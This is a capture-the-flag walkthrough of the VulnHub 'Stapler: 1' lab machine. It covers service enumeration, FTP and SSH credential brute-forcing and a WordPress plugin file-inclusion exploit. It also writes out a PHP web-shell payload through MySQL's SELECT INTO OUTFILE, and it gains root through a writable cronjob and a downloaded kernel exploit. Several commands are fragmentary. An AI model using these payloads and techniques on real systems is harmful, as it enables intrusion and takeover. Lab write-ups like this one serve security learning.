VulnHub: STAPLER: 1-泓源视野

VulnHub: STAPLER: 1

VulnHub: STAPLER: 1

Initial foothold

  1. Network discovery

My target is

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2. Port scan

nmap -Pn -p1000-
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3. OS and service scan

There’re services as listed:

  • port 21 vsftpd w/ anonymous login
  • port 22 OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
  • port 53 dnsmasq 2.75
  • port 80 PHP cli server 5.5 or later
  • port 139 netbios-ssn Samba smbd 4.3.9-Ubuntu (workgroup: WORKGROUP)
  • port 666 doom
  • port 3306 MySQL 5.7.12–0ubuntu1
  • port 12380 Apache httpd 2.4.18 ((Ubuntu))
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4. Vuln scan

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Initial enumeration/searching existing exploits of each service

  • port 21 vsftpd 3.0.3 w/ anonymous login

There aren’t any public exploits that I can use.

Login w/ anonymous

username: anonymous
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List files

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Download it

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Read it

Elly has FTP account.

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  • port 22 OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)

There’s a banner.

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  • port 53 dnsmasq 2.75

Reverse lookup


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  • port 80 PHP cli server 5.5 or later


There’re ‘.bashrc’ and ‘.profile’.

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Download ‘.bashrc’ and ‘.profile’. and read them

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Further directory enumeration


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  • port 139 netbios-ssn Samba smbd 4.3.9-Ubuntu (workgroup: WORKGROUP)

I googled the existing exploit and there’s a sambacry, but I need to have a credential. I’ll leave this for a while.


Samba is a free software re-implementation of the SMB/CIFS networking protocol. Samba provides file and print services…


can access \kathy and \tmp.

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Read the file, I got usernames.

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Save them as users.txt

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Connect accessible directory, /kathy

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dirget to_do-list.txt
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get vsftpd.confget wordpress-4.tar.gz
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Read file

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Unzip WordPress and read its configuration file

cd wordpressfind . -name '*.php' | grep configcat ./wp-config-sample.php


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  • port 666 doom

There’s a file.

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Connect and retrieve the file

ls -la
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Read file’s metadata

It’s a zip file.

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Unzip it

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Open it.

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Connect another accessible directory, /tmp

It’s a program called ‘ls’, not much useful.

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  • port 3306 MySQL 5.7.12–0ubuntu1

I cannot access this right now.

  • port 12380 Apache httpd 2.4.18 ((Ubuntu))


It’s an HTTPS site.

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Nikto again

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Directory enumeration

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Access the site

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Access /admin112233/

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Access /blogblog/

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Read through every post.

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Scan WordPress

There’s a list of users.

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save as ‘users_wp.txt’

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Scan for plugin

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I googled and came across this exploit code of ‘advanced-video-embed-videos-or-playlists’.


WordPress Plugin Advanced Video 1.0 - Local File Inclusion Update - gtech/39646

Read the script and edit it to match the target.

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  1. FTP Port 21 — brute-forcing
  2. SSH Port 22 — brute-forcing
  3. HTTP(S) Port 12380 — brute-forcing and public exploit

Start w/ FTP Port 21 — brute-forcing

I will use users.txt as username and password because some people use the same string to be username and password.

I got the credential.

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username: SHayslettpassword: SHayslettls -la

Not much use right now

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Next is SSH Port 22 — brute-forcing

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Now, I got the shell.

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Last one, HTTP(S) Port 12380 — brute-forcing and public exploit

Starting w/ brute-forcing and leave it for a while.

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Using public exploit

Now I got a MySQL credential.

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4. MySQL port 3306

Remote login w/ root : plbkac

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I’ll create an outfile w/ the content of PHP shell command.

Normally, I’ll store the shell file within the WordPress site. So, the path probably is:

I’ll use MySQL command to create PHP shell.

Select "<?php echo shell_exec($_GET['cmd']);?>" into outfile "/var/www/https/blogblog/wp-content/uploads/shell.php";
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Verify if the file exists.

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Intercept the request w/ Burp Suite and send it to the repeater

Add ‘?cmd=id’ to test the shell function.

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Prepare listener on port 443

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I’ll supply a reverse shell command to the generated shell using this cheatsheet:

Reverse Shell Cheat Sheet

If you're lucky enough to find a command execution vulnerability during a penetration test, pretty soon afterwards…

Encode to URL w/ Burp Suite’s decoder.

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Supply encoded reverse shell command w/ repeater.

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After many tries, I succeeded w/ this command.

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Back to the listener, now I got the shell.

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Privilege Escalation

I’ll continue w/ WordPress shell.

Get TTY shell

  1. Explore directory as listed

I came across this /var/mail/www-data. There’s a PHP-mailer, but I don't know how to exploit it. Let’s skip this for a moment.

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Prepare attacker machine to be file server

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Download, store in /tmp, change permission, and run

wget 777
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These are information that I’ve found interesting.

Kernel version 4.4.0

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User that can run sudo, peter

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Cronjob located in ‘/etc/cron.d’

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Running service, ‘cron -f’ indicating there’s running cronjob.

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There’s a password in ‘.bash_history’

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3. Exploit

  • Login as peter and verify sudo

From result

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Password: JZQuyIN5

Verify sudo

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Change to root


Now, I’m root.

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  • cronjob

From result

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I will verify the path of these services

There’s ‘.sh’ script.

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Verify permission

It’s owned by root and can be edited by anyone.

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Read its content

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Append the command to get a root shell and verify

cat /usr/local/sbin/
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Wait for a while and verify /tmp

Now, I got rootbash

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Run it

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  • kernel exploitation

Verify kernel version

This machine is Linux kernel 4.4.0 32 bit.

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Search w/ searchsploit

After many tries, I succeeded w/ this exploit.

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Copy and read it

cat 39772.txt
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I followed the provided link.

808 - project-zero - Project Zero - Monorail

Edit description

I got the exploit file.

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Download to target machine.

wget http:/ http:/ http:/

Now, I’m root.

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